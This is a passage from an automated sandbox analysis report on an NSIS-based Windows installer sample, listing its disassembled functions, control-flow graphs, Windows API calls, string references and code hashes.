                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2740478559-0
                                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f69 GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 745 401f6e-401f7b 734->745 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 751 402387-40238d GlobalFree 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 750 4030e3-4030f2 745->750 745->751 747->750 763 402708-40270e 748->763 751->750 763->750
                                                  APIs
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GlobalFree.KERNEL32(006540A8), ref: 00402387
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FreeGloballstrcpyn
                                                  • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                  • API String ID: 1459762280-1711415406
                                                  • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                  • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 766 402713-40273b call 406009 * 2 771 402746-402749 766->771 772 40273d-402743 call 40145c 766->772 774 402755-402758 771->774 775 40274b-402752 call 40145c 771->775 772->771 776 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 774->776 777 40275a-402761 call 40145c 774->777 775->774 777->776
                                                  APIs
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                  • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                  • API String ID: 247603264-1827671502
                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 873 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 884 402223-4030f2 call 4062a3 873->884 885 40220d-40221b call 4062a3 873->885 885->884
                                                  APIs
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                  • API String ID: 3156913733-2180253247
                                                  • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                  • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 893 405e7f-405e8b 894 405e8c-405ec0 GetTickCount GetTempFileNameW 893->894 895 405ec2-405ec4 894->895 896 405ecf-405ed1 894->896 895->894 898 405ec6 895->898 897 405ec9-405ecc 896->897 898->897
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 899 402175-40218b call 401446 * 2 904 402198-40219d 899->904 905 40218d-402197 call 4062a3 899->905 907 4021aa-4021b0 EnableWindow 904->907 908 40219f-4021a5 ShowWindow 904->908 905->904 909 4030e3-4030f2 907->909 908->909
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                  • String ID: HideWindow
                                                  • API String ID: 1249568736-780306582
                                                  • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                  • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                  APIs
                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID:
                                                  • API String ID: 3394109436-0
                                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
